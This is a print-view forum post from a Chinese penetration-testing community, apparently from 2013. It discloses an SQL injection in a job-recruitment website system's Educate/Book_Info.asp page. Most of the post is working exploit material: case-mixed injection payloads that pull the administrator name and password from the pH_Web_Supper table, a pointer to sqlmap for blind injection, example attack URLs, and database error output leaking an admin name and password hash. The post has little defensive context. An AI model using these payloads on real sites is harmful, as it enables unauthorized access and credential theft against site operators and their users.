中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版漏洞 [打印本页]

作者: admin    时间: 2013-2-13 23:56
标题: 网络求职招聘人才网站系统正式版漏洞
漏洞出现在Educate/Book_Info.asp
5 y7 U: c) M2 D此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出0 V1 M9 j( s  g
exp:如下; @3 O5 X4 G5 g7 U
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)# q# L3 E) `, t1 ^) @5 g
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 w+ J/ t1 f, dhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
" K4 ^* ?8 Z! ?( C- o* T* Q# R2 i: FMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'3 D, ]5 r2 c. c( W8 U) g9 M
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。$ P% J3 d( E6 ~  K4 X
/Educate/Book_Info.asp,行 8
3 g. }# W, B7 c5 k  {http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
" |4 E- t3 L! F7 iMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'- |% w" s8 o9 H& }/ q4 X
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。+ m3 Q8 J, z( q3 k( D4 X3 h/ ~
/Educate/Book_Info.asp,行 8




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2